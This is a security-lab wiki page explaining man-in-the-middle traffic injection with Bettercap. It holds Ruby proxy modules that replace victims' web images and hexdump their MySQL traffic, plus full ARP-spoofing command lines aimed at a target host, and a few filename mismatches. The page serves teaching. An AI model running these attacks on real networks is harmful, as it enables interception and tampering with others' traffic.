MITM/Traffic Injection
From charlesreid1
Contents
What is traffic injection?
The term "traffic injection," in the context of a Man in the Middle attack, refers to any situation where the attacker is conducting a man in the middle attack and is actively modifying traffic passing between the sheep and the gateway.
This can take many forms, of course:
- Attacker can modify traffic from gateway to sheep, or from sheep to gateway
- Attacker can selectively drop packets for denial of service of certain protocols/content
- Attacker can perform search/replace on traffic (e.g., replace all images with other images)
- Attacker can inject things into traffic, e.g., particular content, javascript/css files, etc.
How traffic injection works
Typically, the way this works is, a man in the middle attacker will set up an HTTP and/or HTTPS proxy server. On one side of the proxy server is the sheep, and on the other side of the proxy server is the client. As traffic from the sheep enters the proxy server, it is passed through any traffic filters, its headers updated, and when (if) it comes out the other side, it is forwarded along to the gateway. Likewise, as traffic from the gateway enters the proxy server, it is passed through different traffic filters, its headers updated, and when (if) it comes out the other side, it is forwarded along to the sheep.
This gives the attacker control of traffic. The different forms of traffic injection (modification, selective drops, search/replace, etc) take the form of different filters that the attacker writes and drops into the proxy server.
Implementation
To actually implement a traffic injection attack, you can use the Bettercap tool to perform a man in the middle attack. Bettercap implements a built-in http and https proxy, which allows you to execute a man-in-the-middle attack and perform traffic injection/modification attacks on the fly, all in one tool. Bettercap can also interface with another non-Bettercap proxy program.
To implement various filters in the proxy, you use Ruby, the language in which Bettercap is implemented.
Bettercap proxy
Bettercap has a --proxy option to enable the proxy. Once you enable the proxy, you'll also want to pick a proxy module using the --proxy-module flag - proxy modules are the filters you're writing and dropping into your proxy filter. These filters are written in Ruby, and there are three existing modules: injecthtml, injectcss. injectjs.
To get help, just add the -h flag after the proxy module specification:
bettercap --proxy-module injecthtml -h
This will print out the bettercap help, with info about the injecthtml module at the very bottom.
Custom Proxy Module: Replacing Images
As a quick example, let's use an example from the bettercap proxy modules repo to illustrate how all of this fits together.
The ruby script [1] is given below:
replace-images.rb
=begin
BETTERCAP
Author : Simone 'evilsocket' Margaritelli
Email : evilsocket@gmail.com
Blog : http://www.evilsocket.net/
This project is released under the GPL 3 license.
=end
# This module requires the --httpd argument being passed
# to bettercap and the --httpd-path pointing to a folder
# which contains a "hack.jpg" image.
class ReplaceImages < BetterCap::Proxy::HTTP::Module
meta(
'Name' => 'ReplaceImages',
'Description' => 'Replace all images on web pages.',
'Version' => '1.0.0',
'Author' => "Simone 'evilsocket' Margaritelli",
'License' => 'GPL3'
)
def initialize
opts = BetterCap::Context.get.options.servers
# make sure the server is running
raise BetterCap::Error, "The ReplaceImages proxy module needs the HTTPD ( --httpd argument ) running." unless opts.httpd
# make sure the file we need actually exists
raise BetterCap::Error, "No hack.png file found in the HTTPD path ( --httpd-path argument ) '#{opts.httpd_path}'" \
unless File.exist? "#{opts.httpd_path}/hack.jpg"
@image_url = "\"http://#{BetterCap::Context.get.iface.ip}:#{opts.httpd_port}/hack.png\""
end
def on_request( request, response )
# is it a html page?
if response.content_type =~ /^text\/html.*/
BetterCap::Logger.info "Replacing http://#{request.host}#{request.path} images."
response.body.gsub! %r/["'][https:\/\/]*[^\s]+\.(png|jpg|jpeg|bmp|gif)["']/i, @image_url
end
end
end
For the lulz, let's suppose our goal is to tamper with the sheep's http traffic, and specifically, our goal is to replace all of the images in their stream with this one:
Pick a directory to put your materials into. This directory will contain a folder called img/, which will contain images being served up, specifically hack.jpg. It will also contain replace_images.rb, the ruby script above. Now we can run bettercap from this directory, specifying the custom Ruby proxy module with the --proxy-module replace_images argument. You will also need to set the --httpd and --httpd-path options to run an http server, from the directory that contains your hack.jpg image, to serve up the image to the sheep.
The whole thing looks like this:
bettercap -I wlan2 -O bettercap_proxy.log -S ARP -X \
--proxy --proxy-module replace_images \
--httpd --httpd-path img \
--gateway 192.168.0.1 --target 192.168.0.7
This worked like a charm. I ran the script on the attacker, closed the browser on the sheep, gave it about 15 seconds, and then opened the browser. It slows down the loading time by a substantial amount - but as you can see, it's worth it:
To see more information, check out the MITM labs: MITM Lab/Bettercap to Replace Images
Custom Proxy Module: MySQL Eavesdropping
The bettercap documentation has a nice example of using the TCP proxy to eavesdrop on TCP traffic: [2]
These register TCP packets as events. Here is a link to bettercap's Ruby documentation with more info about event objects: [3]
Let's create a custom proxy module called eavesdrop_mysql.rb, which has the following contents:
eavesdrop_mysql.rb:
class Example < BetterCap::Proxy::TCP::Module
meta(
'Name' => 'Example',
'Description' => 'Example TCP proxy module.',
'Version' => '1.0.0',
'Author' => "Simone 'evilsocket' Margaritelli",
'License' => 'GPL3'
)
# Received when the victim is sending data to the upstream server.
def on_data( event )
# You can access the request data being sent using the event object:
#
# event.data.gsub!( 'SOMETHING', 'ELSE' )
#
BetterCap::Logger.raw "\n#{BetterCap::StreamLogger.hexdump( event.data )}\n"
end
# Received when the upstream server is sending a response to the victim.
def on_response( event )
# You can access the response data being received using the event object:
#
# event.data.gsub!( 'SOMETHING', 'ELSE' )
#
BetterCap::Logger.raw "\n#{BetterCap::StreamLogger.hexdump( event.data )}\n"
end
end
Now you can run an ARP attack with bettercap, turn on the tcp proxy, and point it to the sheep's MySQL port.
bettercap --tcp-proxy-module example.rb --tcp-proxy-upstream 192.168.0.7:3306
Flags
 |
monkey in the middle attacks in which an attacker tricks two parties into thinking they're communicating with each other, but both are communicating with the attacker.
Wireless Attacks: MITM/Wireless Wired Attacks: MITM/Wired
Layer 1 and 2 MITM Attacks: Network Tap: MITM/Wired/Network Tap Evil Twin Attack: Evil Twin · MITM/Evil Twin
Layer 3 and 4 MITM Attacks:
ARP Poisoning: MITM/ARP Poisoning Traffic Injection/Modification: MITM/Traffic Injection DNS Attacks: MITM/DNS · Bettercap/Failed DNS Spoofing Attack · Bettercap/Failed DNS Spoofing Attack 2 DHCP Attacks: MITM/DHCP WPAD MITM Attack: MITM/WPAD Port Stealing: MITM/Port Stealing Rushing Attack: MITM/Rushing Attack Attacking HTTPS: MITM/HTTPS
Session Hijacking: MITM/Session Hijacking
Toolz:
SSLSniff · SSLStrip · Frankencert
MITM Labs: {{MITMLabs}}
Category:MITM · Category:Attacks · Category:Kali Attack Layers Template:MITMLabs · Template:MITMFlag Flags · Template:MITMFlag · e |